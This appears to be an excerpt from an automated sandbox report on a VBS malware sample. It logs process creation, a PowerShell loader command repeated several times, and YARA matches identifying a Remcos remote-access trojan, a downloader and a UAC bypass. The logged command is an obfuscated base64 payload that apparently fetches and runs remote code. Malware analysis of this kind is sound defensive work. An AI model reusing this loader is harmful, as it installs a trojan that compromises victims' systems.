                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,27_2_004167B4
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B97078D3_2_00007FFD9B97078D
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFD9B950F5B21_2_00007FFD9B950F5B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0043E0CC27_2_0043E0CC
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0041F0FA27_2_0041F0FA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0045415927_2_00454159
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0043816827_2_00438168
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_004461F027_2_004461F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0043E2FB27_2_0043E2FB
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0045332B27_2_0045332B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0042739D27_2_0042739D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_004374E627_2_004374E6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0043E55827_2_0043E558
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0043877027_2_00438770
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_004378FE27_2_004378FE
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0043394627_2_00433946
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0044D9C927_2_0044D9C9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00427A4627_2_00427A46
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0041DB6227_2_0041DB62
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00427BAF27_2_00427BAF
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00437D3327_2_00437D33
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00435E5E27_2_00435E5E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00426E0E27_2_00426E0E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0043DE9D27_2_0043DE9D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00413FCA27_2_00413FCA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00436FEA27_2_00436FEA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00434E10 appears 54 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00402093 appears 50 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00434770 appears 41 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00401E65 appears 34 times
                        Source: sostener.vbsInitial sample: Strings found which are bigger than 50
                        Source: 3.2.powershell.exe.29b32a20000.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                        Source: 21.2.powershell.exe.23a4acf1928.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 21.2.powershell.exe.23a4acf1928.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 21.2.powershell.exe.23a4acf1928.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 21.2.powershell.exe.23a3ac26860.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                        Source: 36.2.powershell.exe.1b9a3da2420.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 36.2.powershell.exe.1b9a3da2420.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 36.2.powershell.exe.1b9a3da2420.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 27.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 27.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 27.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 27.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 27.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 27.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 36.2.powershell.exe.1b9a3da2420.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 36.2.powershell.exe.1b9a3da2420.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 3.2.powershell.exe.29b2a788570.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 3.2.powershell.exe.29b2a788570.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 3.2.powershell.exe.29b2a788570.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 36.2.powershell.exe.1b993cd6900.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                        Source: 21.2.powershell.exe.23a4acf1928.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 21.2.powershell.exe.23a4acf1928.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 3.2.powershell.exe.29b1a88d8c0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                        Source: 36.2.powershell.exe.1b994479a60.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                        Source: 3.2.powershell.exe.29b1bb69730.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                        Source: 21.2.powershell.exe.23a3b3ccdd8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                        Source: 3.2.powershell.exe.29b2a788570.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 3.2.powershell.exe.29b2a788570.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 00000003.00000002.2423857034.0000029B2A4A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 00000003.00000002.2965204743.0000029B32A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                        Source: 00000003.00000002.2423857034.0000029B2A788000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
